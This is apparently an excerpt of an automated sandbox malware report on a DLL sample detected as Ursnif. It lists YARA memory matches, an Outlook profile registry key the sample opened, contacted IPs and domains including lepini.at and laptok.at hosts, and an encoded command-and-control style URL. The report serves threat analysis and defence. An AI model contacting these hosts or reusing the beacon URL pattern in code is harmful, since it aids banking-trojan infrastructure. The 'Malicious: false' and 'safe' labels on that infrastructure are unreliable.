Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY
[Behavior graph rendered as an image in the original report. Caption: Behavior Graph ID: 353243, Sample: NJPcHPuRcG.dll, Startdate: 15/02/2021, Architecture: WINDOWS, Score: 100]

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
34.65.144.159 | unknown | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
104.20.184.68 | unknown | United States | 13335 | CLOUDFLARENETUS | false
151.101.1.44 | unknown | United States | 54113 | FASTLYUS | false

Contacted Domains

Name IP Active
contextual.media.net 23.210.250.97 true
tls13.taboola.map.fastly.net 151.101.1.44 true
hblg.media.net 23.210.250.97 true
c56.lepini.at 34.65.144.159 true
lg3.media.net 23.210.250.97 true
resolver1.opendns.com 208.67.222.222 true
api3.lepini.at 34.65.144.159 true
geolocation.onetrust.com 104.20.184.68 true
api10.laptok.at 34.65.144.159 true
www.msn.com unknown unknown
srtb.msn.com unknown unknown
img.img-taboola.com unknown unknown
web.vortex.data.msn.com unknown unknown
cvision.media.net unknown unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 | false | Avira URL Cloud: safe | unknown